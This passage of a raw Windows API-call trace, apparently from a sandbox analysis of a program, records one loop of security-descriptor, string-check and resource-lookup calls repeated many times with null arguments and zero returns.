DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.020] LockResource (hResData=0x0) returned 0x0 [0070.020] FreeResource (hResData=0x0) returned 0 [0070.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.021] FreeResource (hResData=0x0) returned 0 [0070.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.021] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.022] LockResource (hResData=0x0) returned 0x0 [0070.022] FreeResource (hResData=0x0) returned 0 [0070.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.022] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.023] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.023] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.023] LockResource (hResData=0x0) returned 0x0 [0070.023] FreeResource (hResData=0x0) returned 0 [0070.023] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.023] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.024] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.024] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.024] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.024] LockResource (hResData=0x0) returned 0x0 [0070.024] FreeResource (hResData=0x0) returned 0 [0070.024] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.025] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.025] 